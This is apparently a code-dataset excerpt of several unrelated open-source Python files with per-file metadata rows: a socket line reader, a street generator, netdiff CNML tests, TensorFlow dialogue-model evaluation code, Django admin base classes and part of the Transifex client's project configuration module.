# Copyright (C) 2011 Bruno Rahle
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
class MySocket(socket.socket):
"""Extends socket.socket class and adds the functionality to reads the data
from socket line by line.
"""
BUFFER_SIZE = 4096 # size of the buffer to read
def __init__(self, host, port):
"""Creates the socket.
"""
super(MySocket, self).__init__()
self.connect((host, port))
self._buffer = ''
self._pos = 0
def readline(self):
"""Reads the next line from the socket.
NOTE: Ignores the timeout and blocking status. It just waits for the
complete line to be sent to the socket and returns it.
TODO: account for timeout and blocking status.
"""
line = ''
i = 0
while True:
while (self._pos == len(self._buffer)):
self._buffer = self.recv(self.BUFFER_SIZE)
self._pos = 0
end = self._buffer.find('\n', self._pos)
line = line + self._buffer[self._pos:end]
if end == -1:
self._pos = len(self._buffer)
else:
self._pos = end + 1
return line
| agpl-3.0 | -2,516,814,916,496,474,000 | 34.092593 | 79 | 0.616359 | false |
ctogle/dilapidator | src/dilap/BROKEN/generate/toremove/street.py | 1 | 1258 | import dilap.core.context as dgc
import dilap.generate.landscape as dls
import dilap.generate.lot as dlt
import dilap.primitive.road as dr
import dp_vector as dpv
import dp_quaternion as dpq
class street(dgc.context):
def generate(self,worn = 0):
start = dpv.vector(-100,-300, 20)
end = dpv.vector( 100, 300,-10)
tip = dpv.vector(0,1,0)
tail = dpv.vector(1,1,0)
cs = [dpv.vector(-100,-100, 10),dpv.vector( 100, 100,-10)]
rd = dr.road(start,end,tip,tail,controls = cs)
self._nodes_to_graph(self._node_wrap(rd))
#bbs = []
#lotspace = rd._lotspace(bbs)
#dlot = dlt.lot(lotspace[0],lotspace[1]).generate(worn)
#lsppos,lsprot = lotspace[2],lotspace[3]
#dlot._transform(lsppos,lsprot,dpv.one())
#self._consume(dlot)
#lotspace = rd._lotspace(bbs)
#dlot = dlt.lot(lotspace[0],lotspace[1]).generate(worn)
#lsppos,lsprot = lotspace[2],lotspace[3]
#dlot._transform(lsppos,lsprot,dpv.one())
#self._consume(dlot)
tpts = []
#tpts.extend(dlot.terrain_points)
tpts.extend(rd._terrain_points())
lscape = dls.landscape(controls = tpts)
self._consume(lscape.generate(worn))
| mit | -4,722,324,031,005,298,000 | 30.45 | 66 | 0.605723 | false |
ninuxorg/netdiff | tests/test_cnml.py | 1 | 4009 | import os
import libcnml
import networkx
from netdiff import CnmlParser, diff
from netdiff.exceptions import ParserError
from netdiff.tests import TestCase
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
cnml1 = '{0}/static/26494_detail_1.cnml'.format(CURRENT_DIR)
cnml2 = '{0}/static/26494_detail_2.cnml'.format(CURRENT_DIR)
cnml3 = '{0}/static/26494_detail_3.cnml'.format(CURRENT_DIR)
class TestCnmlParser(TestCase):
def test_parse(self):
p = CnmlParser(cnml1)
self.assertIsInstance(p.graph, networkx.Graph)
def test_parse_exception(self):
with self.assertRaises(ParserError):
CnmlParser('{ "test": "test" }')
def test_json_dict(self):
p = CnmlParser(cnml1)
data = p.json(dict=True)
self.assertIsInstance(data, dict)
self.assertEqual(data['type'], 'NetworkGraph')
self.assertEqual(data['protocol'], 'static')
self.assertEqual(data['version'], None)
self.assertEqual(data['revision'], None)
self.assertEqual(data['metric'], None)
self.assertIsInstance(data['nodes'], list)
self.assertIsInstance(data['links'], list)
self.assertEqual(len(data['nodes']), 5)
self.assertEqual(len(data['links']), 3)
def test_json_string(self):
p = CnmlParser(cnml1)
data = p.json()
self.assertIsInstance(data, str)
self.assertIn('NetworkGraph', data)
self.assertIn('protocol', data)
self.assertIn('version', data)
self.assertIn('revision', data)
self.assertIn('metric', data)
self.assertIn('null', data)
self.assertIn('links', data)
self.assertIn('nodes', data)
def test_no_changes(self):
old = CnmlParser(cnml1)
new = CnmlParser(cnml1)
result = diff(old, new)
self.assertIsInstance(result, dict)
self.assertIsNone(result['added'])
self.assertIsNone(result['removed'])
def test_added_1_link(self):
old = CnmlParser(cnml1)
new = CnmlParser(cnml2)
result = diff(old, new)
self.assertIsNone(result['removed'])
# ensure there are differences
self.assertEqual(len(result['added']['links']), 1)
# ensure 1 link added
self.assertIn('10.228.172.97', result['added']['links'][0].values())
self.assertIn('10.228.172.101', result['added']['links'][0].values())
def test_removed_1_link(self):
old = CnmlParser(cnml2)
new = CnmlParser(cnml1)
result = diff(old, new)
self.assertIsInstance(result, dict)
self.assertIsNone(result['added'])
self.assertTrue(type(result['removed']['links']) is list)
# ensure there are differences
self.assertEqual(len(result['removed']['links']), 1)
# ensure 1 link removed
self.assertIn('10.228.172.97', result['removed']['links'][0].values())
self.assertIn('10.228.172.101', result['removed']['links'][0].values())
def test_simple_diff(self):
old = CnmlParser(cnml1)
new = CnmlParser(cnml3)
result = diff(old, new)
# ensure there are differences
self.assertEqual(len(result['added']['links']), 2)
self.assertEqual(len(result['removed']['links']), 2)
# ensure 2 links added
self._test_expected_links(
graph=result['added'],
expected_links=[
('10.228.172.97', '10.228.172.101'),
('10.228.172.194', '10.228.172.193'),
],
)
# ensure 2 links removed
self._test_expected_links(
graph=result['removed'],
expected_links=[
('10.228.172.33', '10.228.172.34'),
('10.228.172.33', '10.228.172.36'),
],
)
def test_parse_error(self):
with self.assertRaises(ParserError):
CnmlParser(1)
def test_cnml_argument(self):
cnml = libcnml.CNMLParser(cnml1)
CnmlParser(cnml)
| mit | -38,226,968,968,311,980 | 34.166667 | 79 | 0.59566 | false |
jurcicek/ndm | ndm/model.py | 1 | 19396 | #!/usr/bin/env python3
from statistics import mean
import tensorflow as tf
import numpy as np
from tfx.logging import LogMessage
class BaseModel:
def __init__(self, data, FLAGS):
self.data = data
self.FLAGS = FLAGS
self.batch_idx = tf.placeholder("int32", name='batch_idx')
self.phase_train = tf.placeholder(tf.bool, name='phase_train')
self.dropout_keep_prob = tf.placeholder("float32", name='dropout_keep_prob')
self.use_inputs_prob = tf.placeholder("float32", name='use_inputs_prob')
class ModelW2W(BaseModel):
def __init__(self, data, FLAGS):
super(ModelW2W, self).__init__(data, FLAGS)
@staticmethod
def batch_evaluate(func, indexes):
tps, tls, tas = [], [], []
for batch_idx in indexes:
predictions, lss, acc = func(batch_idx)
# print('X1', predictions.shape)
tps.append(np.expand_dims(predictions, axis=0))
tls.append(float(lss))
tas.append(float(acc))
predictions = np.concatenate(tps)
# print('X1', predictions.shape)
lss = mean(tls)
acc = mean(tas)
return predictions, lss, acc
def evaluate(self, epoch, learning_rate, sess):
m = LogMessage()
m.add()
m.add('Epoch: {epoch}'.format(epoch=epoch))
m.add(' - learning rate = {lr:f}'.format(lr=learning_rate.eval()))
def batch_eval_1(batch_idx):
return sess.run(
[self.predictions, self.loss, self.accuracy],
feed_dict={
self.batch_idx: batch_idx,
self.use_inputs_prob: 1.0,
self.dropout_keep_prob: 1.0,
self.phase_train: False,
}
)
train_predictions, train_loss, train_accuracy_action = self.batch_evaluate(batch_eval_1, self.data.train_batch_indexes)
m.add(' Train data')
m.add(' - use inputs prob = {uip:f}'.format(uip=1.0))
m.add(' - loss = {lss:f}'.format(lss=train_loss))
m.add(' - accuracy = {acc:f}'.format(acc=train_accuracy_action))
def batch_eval_0(batch_idx):
return sess.run(
[self.predictions, self.loss, self.accuracy],
feed_dict={
self.batch_idx: batch_idx,
self.use_inputs_prob: 0.0,
self.dropout_keep_prob: 1.0,
self.phase_train: False,
}
)
self.train_predictions_action, train_loss, train_accuracy_action = self.batch_evaluate(batch_eval_0, self.data.train_batch_indexes)
self.train_predictions_action_argmax = np.argmax(self.train_predictions_action, axis=2)
m.add(' - use inputs prob = {uip:f}'.format(uip=0.0))
m.add(' - loss = {lss:f}'.format(lss=train_loss))
m.add(' - accuracy = {acc:f}'.format(acc=train_accuracy_action))
self.dev_predictions_action, dev_loss, dev_accuracy_action = self.batch_evaluate(batch_eval_0, self.data.dev_batch_indexes)
self.dev_predictions_action_argmax = np.argmax(self.dev_predictions_action, axis=2)
m.add(' Dev data')
m.add(' - use inputs prob = {uip:f}'.format(uip=0.0))
m.add(' - loss = {lss:f}'.format(lss=dev_loss))
m.add(' - accuracy = {acc:f}'.format(acc=dev_accuracy_action))
m.add()
m.log()
self.test_predictions_action, test_loss, test_accuracy_action = self.batch_evaluate(batch_eval_0, self.data.test_batch_indexes)
self.test_predictions_action_argmax = np.argmax(self.test_predictions_action, axis=2)
m.add(' Test data')
m.add(' - use inputs prob = {uip:f}'.format(uip=0.0))
m.add(' - loss = {lss:f}'.format(lss=test_loss))
m.add(' - accuracy = {acc:f}'.format(acc=test_accuracy_action))
m.add()
m.log()
return train_accuracy_action, train_loss, \
dev_accuracy_action, dev_loss, \
test_accuracy_action, test_loss
def log_predictions_dataset(self, log_fn, actions, batch_indexes):
m = LogMessage(log_fn=log_fn)
m.add('Shape of action predictions: {s}'.format(s=actions.shape))
m.add('Argmax predictions')
m.add()
for prediction_batch_idx, batch_idx in enumerate(batch_indexes):
for history in range(0, self.data.batch_histories.shape[1]):
m.add('History {h}'.format(h=prediction_batch_idx * self.FLAGS.batch_size + history))
for j in range(self.data.batch_histories.shape[2]):
utterance = []
for k in range(self.data.batch_histories.shape[3]):
w = self.data.idx2word_history[self.data.batch_histories[batch_idx, history, j, k]]
if w not in ['_SOS_', '_EOS_']:
utterance.append(w)
if utterance:
m.add('U {j}: {c:80}'.format(j=j, c=' '.join(utterance)))
prediction = []
for j in range(actions.shape[2]):
w = self.data.idx2word_action[actions[prediction_batch_idx, history, j]]
if w not in ['_SOS_', '_EOS_']:
prediction.append(w)
m.add('P : {t:80}'.format(t=' '.join(prediction)))
target = []
for j in range(self.data.batch_actions.shape[2]):
w = self.data.idx2word_action[self.data.batch_actions[batch_idx, history, j]]
if w not in ['_SOS_', '_EOS_']:
target.append(w)
m.add('T : {t:80}'.format(t=' '.join(target)))
m.add()
# m.log(print_console=True, append=False)
m.log(print_console=False, append=False)
def log_predictions(self):
self.log_predictions_dataset(
'predictions_train_set.txt',
actions=self.train_predictions_action_argmax,
batch_indexes=self.data.train_batch_indexes
)
self.log_predictions_dataset(
'predictions_dev_set.txt',
actions=self.dev_predictions_action_argmax,
batch_indexes=self.data.dev_batch_indexes
)
self.log_predictions_dataset(
'predictions_test_set.txt',
actions=self.test_predictions_action_argmax,
batch_indexes=self.data.test_batch_indexes
)
class ModelW2T(BaseModel):
def __init__(self, data, FLAGS):
super(ModelW2T, self).__init__(data, FLAGS)
@staticmethod
def batch_evaluate(func, indexes):
tps, tls, tas = [], [], []
for batch_idx in indexes:
predictions, lss, acc = func(batch_idx)
# print('X1', predictions.shape)
tps.append(np.expand_dims(predictions, axis=0))
tls.append(float(lss))
tas.append(float(acc))
predictions = np.concatenate(tps)
# print('X1', predictions.shape)
lss = mean(tls)
acc = mean(tas)
return predictions, lss, acc
def evaluate(self, epoch, learning_rate, sess):
m = LogMessage()
m.add('')
m.add('Epoch: {epoch}'.format(epoch=epoch))
m.add(' - learning rate = {lr:e}'.format(lr=learning_rate.eval()))
def batch_eval(batch_idx):
return sess.run(
[self.predictions, self.loss, self.accuracy],
feed_dict={
self.batch_idx: batch_idx,
self.use_inputs_prob: 1.0,
self.dropout_keep_prob: 1.0,
self.phase_train: False,
}
)
self.train_predictions_action, train_loss, train_accuracy_action = self.batch_evaluate(batch_eval, self.data.train_batch_indexes)
self.train_predictions_action_argmax = np.argmax(self.train_predictions_action, axis=2)
m.add(' Train data')
m.add(' - loss = {lss:f}'.format(lss=train_loss))
m.add(' - accuracy = {acc:f}'.format(acc=train_accuracy_action))
self.dev_predictions_action, dev_loss, dev_accuracy_action = self.batch_evaluate(batch_eval, self.data.dev_batch_indexes)
self.dev_predictions_action_argmax = np.argmax(self.dev_predictions_action, axis=2)
m.add(' Dev data')
m.add(' - loss = {lss:f}'.format(lss=dev_loss))
m.add(' - accuracy = {acc:f}'.format(acc=dev_accuracy_action))
self.test_predictions_action, test_loss, test_accuracy_action = self.batch_evaluate(batch_eval, self.data.test_batch_indexes)
self.test_predictions_action_argmax = np.argmax(self.test_predictions_action, axis=2)
m.add(' Test data')
m.add(' - loss = {lss:f}'.format(lss=test_loss))
m.add(' - accuracy = {acc:f}'.format(acc=test_accuracy_action))
m.add()
m.log()
return train_accuracy_action, train_loss, \
dev_accuracy_action, dev_loss, \
test_accuracy_action, test_loss
def log_predictions_dataset(self, log_fn, actions_template, batch_indexes):
m = LogMessage(log_fn=log_fn)
m.add('Shape of action template predictions: {s}'.format(s=actions_template.shape))
m.add()
m.add('Predictions')
m.add()
# print(self.data.batch_histories.shape)
# print(self.data.batch_actions_template.shape)
# print(actions_template.shape)
# print(len(batch_indexes))
for prediction_batch_idx, batch_idx in enumerate(batch_indexes):
for history in range(0, self.data.batch_histories.shape[1]):
m.add('History {h}'.format(h=prediction_batch_idx * self.FLAGS.batch_size + history))
for j in range(self.data.batch_histories.shape[2]):
utterance = []
for k in range(self.data.batch_histories.shape[3]):
w = self.data.idx2word_history[self.data.batch_histories[batch_idx, history, j, k]]
if w not in ['_SOS_', '_EOS_']:
utterance.append(w)
if utterance:
m.add('U {j}: {c:80}'.format(j=j, c=' '.join(utterance)))
m.add('P : {t:80}'.format(
t=self.data.idx2word_action_template[actions_template[prediction_batch_idx, history]])
)
m.add('T : {t:80}'.format(
t=self.data.idx2word_action_template[self.data.batch_actions_template[batch_idx, history]])
)
m.add()
# m.log()
m.log(print_console=False, append=False)
def log_predictions(self):
self.log_predictions_dataset(
'predictions_train_set.txt',
actions_template=self.train_predictions_action_argmax,
batch_indexes=self.data.train_batch_indexes
)
self.log_predictions_dataset(
'predictions_dev_set.txt',
actions_template=self.dev_predictions_action_argmax,
batch_indexes=self.data.dev_batch_indexes
)
self.log_predictions_dataset(
'predictions_test_set.txt',
actions_template=self.test_predictions_action_argmax,
batch_indexes=self.data.test_batch_indexes
)
class ModelW2TArgs(BaseModel):
def __init__(self, data, FLAGS):
super(ModelW2TArgs, self).__init__(data, FLAGS)
@staticmethod
def batch_evaluate(func, indexes):
tp1s, tp2s, tls, ta1s, ta2s = [], [], [], [], []
for batch_idx in indexes:
predictions1, predictions2, lss, acc1, acc2 = func(batch_idx)
# print('X1', predictions.shape)
tp1s.append(np.expand_dims(predictions1, axis=0))
tp2s.append(np.expand_dims(predictions2, axis=0))
tls.append(float(lss))
ta1s.append(float(acc1))
ta2s.append(float(acc2))
predictions1 = np.concatenate(tp1s)
predictions2 = np.concatenate(tp2s)
# print('X1', predictions.shape)
lss = mean(tls)
acc1 = mean(ta1s)
acc2 = mean(ta2s)
return predictions1, predictions2, lss, acc1, acc2
def evaluate(self, epoch, learning_rate, sess):
m = LogMessage()
m.add('')
m.add('Epoch: {epoch}'.format(epoch=epoch))
m.add(' - learning rate = {lr:e}'.format(lr=learning_rate.eval()))
def batch_eval(batch_idx):
return sess.run(
[
self.predictions_action, self.predictions_arguments,
self.loss,
self.accuracy_action, self.accuracy_arguments
],
feed_dict={
self.batch_idx: batch_idx,
self.use_inputs_prob: 1.0,
self.dropout_keep_prob: 1.0,
self.phase_train: False,
}
)
self.train_predictions_action, self.train_predictions_arguments, \
train_loss, \
train_accuracy_action, train_accuracy_arguments = self.batch_evaluate(batch_eval, self.data.train_batch_indexes)
self.train_predictions_action_argmax = np.argmax(self.train_predictions_action, axis=2)
self.train_predictions_arguments_argmax = np.argmax(self.train_predictions_arguments, axis=3)
m.add(' Train data')
m.add(' - loss = {lss:f}'.format(lss=train_loss))
m.add(' - accuracy action = {acc:f}'.format(acc=train_accuracy_action))
m.add(' - accuracy arguments = {acc:f}'.format(acc=train_accuracy_arguments))
self.dev_predictions_action, self.dev_predictions_arguments, \
dev_loss, \
dev_accuracy_action, dev_accuracy_arguments = self.batch_evaluate(batch_eval, self.data.dev_batch_indexes)
self.dev_predictions_action_argmax = np.argmax(self.dev_predictions_action, axis=2)
self.dev_predictions_arguments_argmax = np.argmax(self.dev_predictions_arguments, axis=3)
m.add(' Dev data')
m.add(' - loss = {lss:f}'.format(lss=dev_loss))
m.add(' - accuracy action = {acc:f}'.format(acc=dev_accuracy_action))
m.add(' - accuracy arguments = {acc:f}'.format(acc=dev_accuracy_arguments))
self.test_predictions_action, self.test_predictions_arguments, \
test_loss, \
test_accuracy_action, test_accuracy_arguments = self.batch_evaluate(batch_eval, self.data.test_batch_indexes)
self.test_predictions_action_argmax = np.argmax(self.test_predictions_action, axis=2)
self.test_predictions_arguments_argmax = np.argmax(self.test_predictions_arguments, axis=3)
m.add(' Test data')
m.add(' - loss = {lss:f}'.format(lss=test_loss))
m.add(' - accuracy action = {acc:f}'.format(acc=test_accuracy_action))
m.add(' - accuracy arguments = {acc:f}'.format(acc=test_accuracy_arguments))
m.add()
m.log()
return 0.5 * (train_accuracy_action + train_accuracy_arguments), train_loss, \
0.5 * (dev_accuracy_action + dev_accuracy_arguments), dev_loss, \
0.5 * (test_accuracy_action + test_accuracy_arguments), test_loss
def log_predictions_dataset(self, log_fn, actions_template, actions_arguments, batch_indexes):
m = LogMessage(log_fn=log_fn)
m.add('Shape of action template predictions: {s}'.format(s=actions_template.shape))
m.add('Shape of action arguments predictions: {s}'.format(s=actions_arguments.shape))
m.add()
m.add('Predictions')
m.add()
# print(self.data.batch_histories.shape)
# print(self.data.batch_actions_template.shape)
# print(self.data.batch_actions_arguments.shape)
# print(actions_template.shape)
# print(actions_arguments.shape)
# print(len(batch_indexes))
for prediction_batch_idx, batch_idx in enumerate(batch_indexes):
for history in range(0, self.data.batch_histories.shape[1]):
m.add('History {h}'.format(h=prediction_batch_idx * self.FLAGS.batch_size + history))
for j in range(self.data.batch_histories.shape[2]):
utterance = []
for k in range(self.data.batch_histories.shape[3]):
w = self.data.idx2word_history[self.data.batch_histories[batch_idx, history, j, k]]
if w not in ['_SOS_', '_EOS_']:
utterance.append(w)
if utterance:
m.add('U {j:2} : {c:80}'.format(j=j, c=' '.join(utterance)))
w_histories_arguments = []
for j in range(self.data.batch_histories_arguments.shape[2]):
w = self.data.idx2word_history_arguments[self.data.batch_histories_arguments[batch_idx, history, j]]
w_histories_arguments.append(w)
m.add('ArgsH: {t:80}'.format(t=', '.join(w_histories_arguments)))
m.add('P : {t:80}'.format(
t=self.data.idx2word_action_template[actions_template[prediction_batch_idx, history]])
)
w_actions_arguments = []
for j in range(actions_arguments.shape[2]):
w = self.data.idx2word_action_arguments[actions_arguments[prediction_batch_idx, history, j]]
w_actions_arguments.append(w)
m.add('ArgsP: {t:80}'.format(t=', '.join(w_actions_arguments)))
m.add('T : {t:80}'.format(
t=self.data.idx2word_action_template[self.data.batch_actions_template[batch_idx, history]])
)
w_actions_arguments = []
for j in range(self.data.batch_actions_arguments.shape[2]):
w = self.data.idx2word_action_arguments[self.data.batch_actions_arguments[batch_idx, history, j]]
w_actions_arguments.append(w)
m.add('ArgsT: {t:80}'.format(t=', '.join(w_actions_arguments)))
m.add()
# m.log(print_console=True, append=False)
m.log(print_console=False, append=False)
def log_predictions(self):
self.log_predictions_dataset(
'predictions_train_set.txt',
actions_template=self.train_predictions_action_argmax,
actions_arguments=self.train_predictions_arguments_argmax,
batch_indexes=self.data.train_batch_indexes
)
self.log_predictions_dataset(
'predictions_dev_set.txt',
actions_template=self.dev_predictions_action_argmax,
actions_arguments=self.dev_predictions_arguments_argmax,
batch_indexes=self.data.dev_batch_indexes
)
self.log_predictions_dataset(
'predictions_test_set.txt',
actions_template=self.test_predictions_action_argmax,
actions_arguments=self.test_predictions_arguments_argmax,
batch_indexes=self.data.test_batch_indexes
)
| apache-2.0 | -3,818,700,218,189,610,000 | 41.257081 | 139 | 0.562951 | false |
idlesign/django-etc | etc/admin/admins.py | 1 | 2599 | from django.contrib import admin
from django.contrib import messages
from django.db import models
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.urls import path
if False: # pragma: nocover
from .models import CustomModelPage # noqa
class EtcAdmin(admin.ModelAdmin):
"""Base etc admin."""
def message_success(self, request: HttpRequest, msg: str):
self.message_user(request, msg, messages.SUCCESS)
def message_warning(self, request: HttpRequest, msg: str):
self.message_user(request, msg, messages.WARNING)
def message_error(self, request: HttpRequest, msg: str):
self.message_user(request, msg, messages.ERROR)
class ReadonlyAdmin(EtcAdmin):
"""Read-only etc admin base class."""
view_on_site: bool = False
actions = None
def has_add_permission(self, request: HttpRequest) -> bool:
return False
def has_delete_permission(self, request: HttpRequest, obj: models.Model = None) -> bool:
return False
def changeform_view(
self,
request: HttpRequest,
object_id: int = None,
form_url: str = '',
extra_context: dict = None
) -> HttpResponse:
extra_context = extra_context or {}
extra_context.update({
'show_save_and_continue': False,
'show_save': False,
})
return super().changeform_view(request, object_id, extra_context=extra_context)
class CustomPageModelAdmin(ReadonlyAdmin):
"""Base for admin pages with contents based on custom models."""
def get_urls(self) -> list:
meta = self.model._meta
patterns = [path(
'',
self.admin_site.admin_view(self.view_custom),
name=f'{meta.app_label}_{meta.model_name}_changelist'
)]
return patterns
def has_add_permission(self, request: HttpRequest) -> bool:
return True
def view_custom(self, request: HttpRequest) -> HttpResponse:
context: dict = {
'show_save_and_continue': False,
'show_save_and_add_another': False,
'title': self.model._meta.verbose_name,
}
return self._changeform_view(request, object_id=None, form_url='', extra_context=context)
def response_add(self, request: HttpRequest, obj: 'CustomModelPage', post_url_continue=None):
return HttpResponseRedirect(request.path)
def save_model(self, request: HttpRequest, obj: 'CustomModelPage', form, change):
obj.bound_request = request
obj.bound_admin = self
obj.save()
| bsd-3-clause | 7,494,133,136,866,920,000 | 31.08642 | 97 | 0.643709 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/txclib/project.py | 1 | 48650 | # -*- coding: utf-8 -*-
import getpass
import os
import re
import fnmatch
import datetime
import time
import ssl
try:
import configparser
except ImportError:
import ConfigParser as configparser
from txclib.web import *
from txclib.utils import *
from txclib.packages import urllib3
from txclib.packages.urllib3.packages import six
from txclib.urls import API_URLS
from txclib.config import OrderedRawConfigParser, Flipdict
from txclib.log import logger
from txclib.processors import visit_hostname
from txclib.paths import posix_path, native_path, posix_sep
from txclib.packages.urllib3.exceptions import SSLError
class ProjectNotInit(Exception):
pass
class Project(object):
"""
Represents an association between the local and remote project instances.
"""
def __init__(self, path_to_tx=None, init=True):
"""
Initialize the Project attributes.
"""
if init:
self._init(path_to_tx)
def _init(self, path_to_tx=None):
instructions = "Run 'tx init' to initialize your project first!"
try:
self.root = self._get_tx_dir_path(path_to_tx)
self.config_file = self._get_config_file_path(self.root)
self.config = self._read_config_file(self.config_file)
self.txrc_file = self._get_transifex_file()
local_txrc_file = self._get_transifex_file(os.getcwd())
self.txrc = self._get_transifex_config([self.txrc_file, local_txrc_file])
if os.path.exists(local_txrc_file):
self.txrc_file = local_txrc_file
except ProjectNotInit as e:
logger.error('\n'.join([six.u(str(e)), instructions]))
raise
host = self.config.get('main', 'host')
if host.lower().startswith('https://'):
self.conn = urllib3.connection_from_url(
host,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=certs_file()
)
else:
self.conn = urllib3.connection_from_url(host)
def _get_config_file_path(self, root_path):
"""Check the .tx/config file exists."""
config_file = os.path.join(root_path, ".tx", "config")
logger.debug("Config file is %s" % config_file)
if not os.path.exists(config_file):
msg = "Cannot find the config file (.tx/config)!"
raise ProjectNotInit(msg)
return config_file
def _get_tx_dir_path(self, path_to_tx):
"""Check the .tx directory exists."""
root_path = path_to_tx or find_dot_tx()
logger.debug("Path to tx is %s." % root_path)
if not root_path:
msg = "Cannot find any .tx directory!"
raise ProjectNotInit(msg)
return root_path
def _read_config_file(self, config_file):
"""Parse the config file and return its contents."""
config = OrderedRawConfigParser()
try:
config.read(config_file)
except Exception as err:
msg = "Cannot open/parse .tx/config file: %s" % err
raise ProjectNotInit(msg)
return config
def _get_transifex_config(self, txrc_files):
"""Read the configuration from the .transifexrc files."""
txrc = OrderedRawConfigParser()
try:
txrc.read(txrc_files)
except Exception as e:
msg = "Cannot read configuration file: %s" % e
raise ProjectNotInit(msg)
self._migrate_txrc_file(txrc)
return txrc
def _migrate_txrc_file(self, txrc):
"""Migrate the txrc file, if needed."""
if not os.path.exists(self.txrc_file):
return txrc
for section in txrc.sections():
orig_hostname = txrc.get(section, 'hostname')
hostname = visit_hostname(orig_hostname)
if hostname != orig_hostname:
msg = "Hostname %s should be changed to %s."
logger.info(msg % (orig_hostname, hostname))
if (sys.stdin.isatty() and sys.stdout.isatty() and
confirm('Change it now? ', default=True)):
txrc.set(section, 'hostname', hostname)
msg = 'Hostname changed'
logger.info(msg)
else:
hostname = orig_hostname
self._save_txrc_file(txrc)
return txrc
def _get_transifex_file(self, directory=None):
"""Fetch the path of the .transifexrc file.
It is in the home directory of the user by default.
"""
if directory is not None:
logger.debug(".transifexrc file is at %s" % directory)
return os.path.join(directory, ".transifexrc")
directory = os.path.expanduser('~')
txrc_file = os.path.join(directory, ".transifexrc")
logger.debug(".transifexrc file is at %s" % directory)
if not os.path.exists(txrc_file):
msg = "%s not found." % (txrc_file)
logger.info(msg)
mask = os.umask(0o077)
open(txrc_file, 'w').close()
os.umask(mask)
return txrc_file
def validate_config(self):
"""
To ensure the json structure is correctly formed.
"""
pass
def getset_host_credentials(self, host, user=None, password=None):
"""
Read .transifexrc and report user,pass for a specific host else ask the
user for input.
"""
try:
username = self.txrc.get(host, 'username')
passwd = self.txrc.get(host, 'password')
except (configparser.NoOptionError, configparser.NoSectionError):
logger.info("No entry found for host %s. Creating..." % host)
username = user or input("Please enter your transifex username: ")
while (not username):
username = input("Please enter your transifex username: ")
passwd = password
while (not passwd):
passwd = getpass.getpass()
logger.info("Updating %s file..." % self.txrc_file)
self.txrc.add_section(host)
self.txrc.set(host, 'username', username)
self.txrc.set(host, 'password', passwd)
self.txrc.set(host, 'token', '')
self.txrc.set(host, 'hostname', host)
return username, passwd
def set_remote_resource(self, resource, source_lang, i18n_type, host,
file_filter="translations<sep>%(proj)s.%(res)s<sep><lang>.%(extension)s"):
"""Method to handle the add/conf of a remote resource."""
if not self.config.has_section(resource):
self.config.add_section(resource)
p_slug, r_slug = resource.split('.', 1)
file_filter = file_filter.replace("<sep>", r"%s" % posix_sep)
self.url_info = {
'host': host,
'project': p_slug,
'resource': r_slug
}
extension = self._extension_for(i18n_type)[1:]
self.config.set(resource, 'source_lang', source_lang)
self.config.set(
resource, 'file_filter',
file_filter % {'proj': p_slug, 'res': r_slug, 'extension': extension}
)
self.config.set(resource, 'type', i18n_type)
if host != self.config.get('main', 'host'):
self.config.set(resource, 'host', host)
def get_resource_host(self, resource):
"""
Returns the host that the resource is configured to use. If there is no
such option we return the default one
"""
return self.config.get('main', 'host')
def get_resource_lang_mapping(self, resource):
"""Get language mappings for a specific resource."""
lang_map = Flipdict()
try:
args = self.config.get("main", "lang_map")
for arg in args.replace(' ', '').split(','):
k,v = arg.split(":")
lang_map.update({k:v})
except configparser.NoOptionError:
pass
except (ValueError, KeyError):
raise Exception("Your lang map configuration is not correct.")
if self.config.has_section(resource):
res_lang_map = Flipdict()
try:
args = self.config.get(resource, "lang_map")
for arg in args.replace(' ', '').split(','):
k,v = arg.split(":")
res_lang_map.update({k:v})
except configparser.NoOptionError:
pass
except (ValueError, KeyError):
raise Exception("Your lang map configuration is not correct.")
# merge the lang maps and return result
lang_map.update(res_lang_map)
return lang_map
def get_source_file(self, resource):
"""
Get source file for a resource.
"""
if self.config.has_section(resource):
source_lang = self.config.get(resource, "source_lang")
source_file = self.get_resource_option(resource, 'source_file') or None
if source_file is None:
try:
file_filter = self.config.get(resource, "file_filter")
filename = file_filter.replace('<lang>', source_lang)
if os.path.exists(filename):
return native_path(filename)
except configparser.NoOptionError:
pass
else:
return native_path(source_file)
def get_resource_files(self, resource):
"""
Get a dict for all files assigned to a resource. First we calculate the
files matching the file expression and then we apply all translation
excpetions. The resulting dict will be in this format:
{ 'en': 'path/foo/en/bar.po', 'de': 'path/foo/de/bar.po', 'es': 'path/exceptions/es.po'}
NOTE: All paths are relative to the root of the project
"""
tr_files = {}
if self.config.has_section(resource):
try:
file_filter = self.config.get(resource, "file_filter")
except configparser.NoOptionError:
file_filter = "$^"
source_lang = self.config.get(resource, "source_lang")
source_file = self.get_source_file(resource)
expr_re = regex_from_filefilter(file_filter, self.root)
expr_rec = re.compile(expr_re)
for f_path in files_in_project(self.root):
match = expr_rec.match(posix_path(f_path))
if match:
lang = match.group(1)
if lang != source_lang:
f_path = os.path.relpath(f_path, self.root)
if f_path != source_file:
tr_files.update({lang: f_path})
for (name, value) in self.config.items(resource):
if name.startswith("trans."):
value = native_path(value)
lang = name.split('.')[1]
# delete language which has same file
if value in list(tr_files.values()):
keys = []
for k, v in six.iteritems(tr_files):
if v == value:
keys.append(k)
if len(keys) == 1:
del tr_files[keys[0]]
else:
raise Exception("Your configuration seems wrong."\
" You have multiple languages pointing to"\
" the same file.")
# Add language with correct file
tr_files.update({lang:value})
return tr_files
return None
def get_resource_option(self, resource, option):
"""
Return the requested option for a specific resource
If there is no such option, we return None
"""
if self.config.has_section(resource):
if self.config.has_option(resource, option):
return self.config.get(resource, option)
return None
def get_resource_list(self, project=None):
"""
Parse config file and return tuples with the following format
[ (project_slug, resource_slug), (..., ...)]
"""
resource_list= []
for r in self.config.sections():
if r == 'main':
continue
p_slug, r_slug = r.split('.', 1)
if project and p_slug != project:
continue
resource_list.append(r)
return resource_list
def save(self):
"""
Store the config dictionary in the .tx/config file of the project.
"""
self._save_tx_config()
self._save_txrc_file()
